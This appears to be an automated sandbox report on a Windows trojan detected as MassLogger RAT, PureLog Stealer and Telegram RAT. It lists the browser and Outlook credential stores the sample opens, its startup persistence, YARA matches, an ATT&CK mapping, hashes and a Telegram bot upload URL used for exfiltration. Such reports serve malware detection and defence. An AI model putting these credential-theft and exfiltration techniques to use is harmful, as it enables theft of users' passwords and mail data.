Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: definitiveness.exe	Binary or memory string: WIN_81
Source: definitiveness.exe	Binary or memory string: WIN_XP
Source: definitiveness.exe	Binary or memory string: WIN_XPe
Source: definitiveness.exe	Binary or memory string: WIN_VISTA
Source: definitiveness.exe	Binary or memory string: WIN_7
Source: definitiveness.exe	Binary or memory string: WIN_8
Source: definitiveness.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3599294917.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599413554.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00E76283
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00E76747
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00676283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00676283
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00676747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00676747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	341 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CvzLvta2bG.exe	74%	Virustotal		Browse
CvzLvta2bG.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
CvzLvta2bG.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	74%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.32.1	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.3599413554.0000000003088000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.0000000003549000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.3599413554.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States		16989	UTMEMUS	false
104.21.32.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587975
Start date and time:	2025-01-10 20:02:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CvzLvta2bG.exe renamed because original name is a hash value
Original Sample Name:	9880b5e431d9441856a10a0031353a164aa3d792474912f9c96796092978ad40.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 53 Number of non-executed functions: 283
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:04:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	jqxrkk.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
104.21.32.1	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
checkip.dyndns.com	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
CLOUDFLARENETUS	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	104.21.7.187
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	Message 2.eml	Get hash	malicious	Unknown	Browse	172.64.41.3
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	104.23.145.230
	Message.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	FPACcnxAUT.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	jxy62Zm6c4.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1

Process:	C:\Users\user\Desktop\CvzLvta2bG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1117184
Entropy (8bit):	7.083833005366142
Encrypted:	false
SSDEEP:	24576:vu6J33O0c+JY5UZ+XC0kGso6FaMOIEEOVoMZWY:Zu0c++OCvkGs9FaM/5OVkY
MD5:	61A2F4563666BDBF6D6CE0EC58F57C64
SHA1:	B2CBEBA9B074991E13DF15C90A4DFC445B4875A4
SHA-256:	9880B5E431D9441856A10A0031353A164AA3D792474912F9C96796092978AD40
SHA-512:	31E351E9B3034D0600930C034ABA5F016B35525BA3059E25E315B63CAE51EAB70D2D96F7F97E4F00235C0BBB48275418EBA2E9CD296E56A32073D4E3407DC207
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76% Antivirus: Virustotal, Detection: 74%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...d._g.........."..........*.......}............@.................................V#....@...@.......@.....................L...\|....p.. ........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc... ....p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\atule

Download File

Process:	C:\Users\user\Desktop\CvzLvta2bG.exe
File Type:	data
Category:	dropped
Size (bytes):	209408
